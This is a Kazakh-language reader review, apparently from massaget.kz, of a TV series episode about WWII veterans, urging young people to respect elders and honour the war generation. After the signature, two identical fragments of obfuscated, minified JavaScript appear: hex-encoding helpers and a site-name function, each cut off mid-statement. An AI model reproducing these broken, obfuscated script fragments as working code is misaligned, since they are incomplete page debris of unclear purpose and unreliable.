Өмірдің өзі новелла. Жұлдыздар сөніп барады.

Сәлеметсіздер ме,массагеттіктер? Қалайсыздар? Бүгін мен сіздерге  Қазақстан ұлттық арнасының "Өмірдің өзі новелла" телехикаясының,өзіме ұнаған бөлімі жайлы жазғым келіп тұр. Ұлы Отан соғысының ардагерлері жайлы және қазіргі қоғам шындығы!

"Өмірдің өзі новелла" телехикаясының «Жұлдыздар сөніп барады» бөлімі өзгеге ой саларлық мағыналы болды. Ұлы Отан соғысына қатысқан ардагерлер желісінде түсірілген бұл бөлім ұрпағының (Бәрі емес ,әрине) сөнген отанға деген махаббатын, үлкенге деген құрметін оятты. Ұлы Отан соғысының ардагерлеріне құрмет көрсету біздің борышымыз. Бірақ қазіргі жастар үлкенді құрметтеу деген сөзді ойына да алмайды. Қаншама адам отбасын тастап соғысқа кетті, қаншама жан о дүниеге кетті ,қаншама қан себепсіз төгілді, қаншама аналарымыз жесір қалды, қаншама сәби ата-анасыз өсіті, қаншама бүлдіршін балалық шақтың қызығын көрмеді, сондағы мақсаттары ұрпағы бейбіт, ашық аспанда өмір сүрсін деп.

Бірақ фильмдегі Сәрсен және Гүля секілді жастар мұның қадірін білер емес . Бұл кісілердің аянбай, тыныш өмір сүрсін деген жасатары- үлкенді құрметтемесін деп пе, Валентин күнін тойлап ,дінсіз болсын деп пе, түнгі клубтын жұлдызы болсын деп пе, әлде өздерінің қадірін білмесін деп пе? Жоқ,олай емес олар ,яғни Ақтай секілді аталарымыз ұрпақтары "Тәуелсіз-Қазақстан" деген жерде иманды, адамгершілігі мол жастар тұрсындеп өз-өзін аямай, алдыға қойған мақсаты үшін соғысты. Соғысқа елімізден 1,5 млн адам қатысса соның 500 мыңы із-түссіз жоқ боп кетті, белгісіз,табылмады. Сол кісілердің еңбегін ақтап, Қазақстан атты мемлекетті дүние жүзіне таныту, дамыту ,көркейту -біздің мақсатымыз ,жас қазақ! 

Осы фильмді Қазақстанға көрсетіп,үлкен ой салдырған Қазақстан ұлттық арнасына алғысым шексіз!

Тілеулесова Ұ.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: